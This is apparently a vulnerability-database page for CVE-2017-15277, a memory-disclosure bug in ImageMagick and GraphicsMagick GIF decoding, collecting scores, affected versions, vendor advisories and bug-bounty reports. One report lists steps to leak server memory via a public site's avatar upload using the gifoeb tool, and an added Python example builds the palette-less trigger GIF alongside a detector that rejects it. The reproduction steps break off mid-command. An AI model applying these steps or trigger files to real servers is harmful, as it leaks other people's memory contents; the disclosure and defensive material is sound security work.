CVE-2017-15277
Published 2017-10-12
Priority P3 · 41 · medium 6.5 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:R / S:U / C:H / I:N / A:N
EPSS: 19.19% (97.0th percentile)
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
Affected
12 ranges indexed; duplicate rows collapsed
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | graphicsmagick | < 1.3.26-14 (bookworm) | 1.3.26-14 (bookworm) |
| debian | imagemagick | < 8:6.9.9.34+dfsg-3 | 8:6.9.9.34+dfsg-3 |
| graphicsmagick | graphicsmagick | — | — |
| graphicsmagick | graphicsmagick | >= 0 < 1.3.26-14 | 1.3.26-14 |
| imagemagick | imagemagick | — | — |
| imagemagick | imagemagick | >= 0 < 8:6.9.9.34+dfsg-3 | 8:6.9.9.34+dfsg-3 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 6.5 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:N/A:N |
| osv | — | 6.5 | MEDIUM | — |
| vendor_debian | — | 6.5 | MEDIUM | — |
| vendor_redhat | — | 6.5 | MEDIUM | — |
Ubuntu
GraphicsMagick vulnerabilities
vendor_ubuntu·2020-01-08
CVE-2017-14165 GraphicsMagick vulnerabilities
Title: GraphicsMagick vulnerabilities
Summary: Several security issues were fixed in GraphicsMagick.
It was discovered that GraphicsMagick incorrectly handled certain image files.
An attacker could possibly use this issue to cause a denial of service or other
unspecified impact.
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
ImageMagick vulnerabilities
vendor_ubuntu·2018-06-12
CVE-2017-1000445 ImageMagick vulnerabilities
Title: ImageMagick vulnerabilities
Summary: Several security issues were fixed in ImageMagick.
It was discovered that ImageMagick incorrectly handled certain malformed
image files. If a user or automated system using ImageMagick were tricked
into opening a specially crafted image, an attacker could exploit this to
cause a denial of service or possibly execute code with the privileges of
the user invoking the program.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
ImageMagick: Uninitialized palette in ReadGIFImage when processing a crafted GIF file
vendor_redhat·2017-07-21·CVSS 6.5
CVE-2017-15277 [MEDIUM] CWE-200
Package: ImageMagick (Red Hat Enterprise Linux 5) - Will not fix
Package: ImageMagick (Red Hat Enterprise Linux 6) - Will not fix
Package: ImageMagick (Red Hat Enterprise Linux 7) - Will not fix
Debian
CVE-2017-15277: graphicsmagick - ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 le...
vendor_debian·2017·CVSS 6.5
CVE-2017-15277 [MEDIUM]
Scope: local
bookworm: resolved (fixed in 1.3.26-14)
bullseye: resolved (fixed in 1.3.26-14)
forky: resolved (fixed in 1.3.26-14)
sid: resolved (fixed in 1.3.26-14)
trixie: resolved (fixed in 1.3.26-14)
GHSA
GHSA-844h-5pcp-3xmc: ReadGIFImage in coders/gif
ghsa_unreviewed·2022-05-14
CVE-2017-15277 [MEDIUM] CWE-200
OSV
CVE-2017-15277: ReadGIFImage in coders/gif
osv·2017-10-12·CVSS 6.5
CVE-2017-15277 [MEDIUM]
No detection rules found.
No public exploits indexed.
HackerOne
ImageMagick GIF coder vulnerability leading to memory disclosure
hackerone·2018-07-02·CVSS 6.5
CVE-2017-15277 [MEDIUM]
Due to CVE-2017-15277, portions of server memory on some steamcommunity web servers could be leaked via image updates. An attacker would not be able to control what memory would be returned, but system information could be obtained.
I was able to arbitrarily disclose server memory on steamcommunity.com due to CVE-2017-15277.
HackerOne
CVE-2017-15277 on Profile page
hackerone·2018-03-08·CVSS 6.5
CVE-2017-15277 [MEDIUM]
Hi security team,
**Summary:** Please refer to #302885 for more details. Uploading a .gif produces significantly different images every time which means the server is leaking information.
## Steps To Reproduce:
1. Clone https://github.com/neex/gifoeb
2. Generate exploitable gif with ./gifoeb gen 5120x5120
3. Upload gif as a profile picture at https://www.niche.co/users/{username}/account
4. Download the preview from aws at https://niche-s3-production.s3.amazonaws.com/uploads/user/avatar/.... as preview.ext
5. run `` r=$(identify -format '%wx%h' preview.ext[0]) && for i in `seq 1 10` ; do ./gifoeb gen $r for_upload/$i.gif; done``
6. Upload the gif to the server and download the results
7. Recover the servers response with ` for p in previews/*; do ./gifo
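The input both the advisory text and the two reports above hinge on is a GIF frame with no colour table at all: no Global Color Table behind the Logical Screen Descriptor and no Local Color Table in the Image Descriptor. The gifoeb procedure above feeds such a file to the server and reads back the re-encoded preview, whose colours then come from whatever the decoder happened to have in memory. The following is an added example written for this page, not code from ImageMagick, GraphicsMagick, gifoeb or either reporter. It builds a single-frame GIF89a with or without a palette (a 16x16 probe with one pixel per palette index, so every one of the 256 entries is referenced by some pixel), and it walks the block structure to list frames that have neither table. That second part is the ingest-side check for a pipeline sitting in front of an ImageMagick or GraphicsMagick that cannot be updated (the Red Hat entry above marks RHEL 5, 6 and 7 as "Will not fix"): reject the upload when frames_without_palette() returns anything. The LZW writer emits literal codes only, with a clear code every 250 pixels, so the stream is valid without implementing compression; it needs nothing beyond the standard library.

```python
"""GIF builder/inspector for the CVE-2017-15277 trigger condition (added example;
not code from ImageMagick, GraphicsMagick or gifoeb). Per the GIF89a spec, bit 7 of
the Logical Screen Descriptor's packed byte flags a Global Color Table and bit 7 of
each Image Descriptor's packed byte flags a Local Color Table."""
import struct

EXT_INTRODUCER, IMG_SEPARATOR, TRAILER = 0x21, 0x2C, 0x3B


def encode_lzw_indices(indices, min_code_size=8):
    """Non-compressing GIF-LZW: each pixel as a literal (min_code_size+1)-bit code,
    LSB-first. A clear code opens the stream and recurs every 250 pixels so the
    decoder's table never fills enough to widen the codes; EOI closes it."""
    clear, eoi, width = 1 << min_code_size, (1 << min_code_size) + 1, min_code_size + 1
    codes = []
    for i, idx in enumerate(indices):
        codes += [clear, idx] if i % 250 == 0 else [idx]
    codes.append(eoi)
    out, acc, nbits = bytearray(), 0, 0
    for code in codes:
        acc |= code << nbits
        nbits += width
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    if nbits:
        out.append(acc & 0xFF)
    return bytes(out)

def sub_blocks(data):
    """Wrap raw bytes as GIF data sub-blocks (<=255 bytes each) plus the 0 terminator."""
    out = bytearray()
    for i in range(0, len(data), 255):
        out.append(len(data[i:i + 255]))
        out += data[i:i + 255]
    return bytes(out + b"\x00")

def _table_bytes(palette):  # tables here are always 256 entries (size field 7)
    assert len(palette) == 256
    return b"".join(bytes(rgb) for rgb in palette)

def build_gif(width, height, indices, global_palette=None, local_palette=None):
    """Single-frame GIF89a. indices: width*height values 0..255; each palette is
    256 (r, g, b) tuples or None. Both None = well-formed file with no colour table,
    the input the advisory describes."""
    assert len(indices) == width * height
    out = bytearray(b"GIF89a")
    lsd_packed = (0x80 if global_palette is not None else 0) | (7 << 4) | 7
    out += struct.pack("<HHBBB", width, height, lsd_packed, 0, 0)
    if global_palette is not None:
        out += _table_bytes(global_palette)
    img_packed = (0x80 | 7) if local_palette is not None else 0
    out += struct.pack("<BHHHHB", IMG_SEPARATOR, 0, 0, width, height, img_packed)
    if local_palette is not None:
        out += _table_bytes(local_palette)
    out.append(8)  # LZW minimum code size
    out += sub_blocks(encode_lzw_indices(indices, 8))
    out.append(TRAILER)
    return bytes(out)

def _skip_sub_blocks(buf, pos):
    while buf[pos] != 0:
        pos += 1 + buf[pos]
    return pos + 1

def color_table_report(gif):
    """Return (global_table_present, [local_table_present per frame]); raises on junk."""
    if gif[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed, pos = gif[10], 13
    has_gct = bool(packed & 0x80)
    if has_gct:
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    frames = []
    while pos < len(gif):
        block = gif[pos]
        if block == TRAILER:
            return has_gct, frames
        if block == EXT_INTRODUCER:
            pos = _skip_sub_blocks(gif, pos + 2)  # introducer + label, then data
        elif block == IMG_SEPARATOR:
            img_packed = gif[pos + 9]
            frames.append(bool(img_packed & 0x80))
            pos += 10 + (3 * (2 ** ((img_packed & 0x07) + 1)) if frames[-1] else 0)
            pos = _skip_sub_blocks(gif, pos + 1)  # skip LZW min code size, then data
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (block, pos))
    raise ValueError("missing trailer")

def frames_without_palette(gif):
    """Frames with no local table and no global one to fall back on: the frames an
    affected decoder would colour from uninitialized memory. Non-empty => reject."""
    has_gct, frames = color_table_report(gif)
    return [] if has_gct else [i for i, lct in enumerate(frames) if not lct]


if __name__ == "__main__":
    probe = build_gif(16, 16, list(range(256)))  # one pixel per palette index
    print(len(probe), "bytes; frames lacking any palette:", frames_without_palette(probe))
```

A quick differential check in the spirit of the second report: render the same probe twice through the suspect decoder and compare the two outputs byte for byte. With a fixed decoder the results are identical; with the uninitialized palette they usually differ, which is what "significantly different images every time" describes. The structural check is deliberately narrow: a file that passes it can still carry every other malformed-GIF problem, so it is a stop-gap for hosts that cannot take the upstream fix, not a replacement for it.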
Bugzilla
CVE-2017-15277 ImageMagick: Uninitialized palette in ReadGIFImage when processing a crafted GIF file
bugzilla·2017-11-07·CVSS 6.5
CVE-2017-15277 [MEDIUM]
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
Upstream issue:
https://github.com/ImageMagick/ImageMagick/issues/592
Upstream patch:
https://github.com/ImageMagick/ImageMagick/commit/9fd10cf630832b36a588c1545d8736539b2f1fb5
References
https://github.com/ImageMagick/ImageMagick/commit/9fd10cf630832b36a588c1545d8736539b2f1fb5
https://github.com/ImageMagick/ImageMagick/issues/592
https://github.com/neex/gifoeb
https://lists.debian.org/debian-lts-announce/2018/08/msg00002.html
https://usn.ubuntu.com/3681-1/
https://usn.ubuntu.com/4232-1/
https://www.debian.org/security/2017/dsa-4032
https://www.debian.org/security/2017/dsa-4040
https://www.debian.org/security/2018/dsa-4321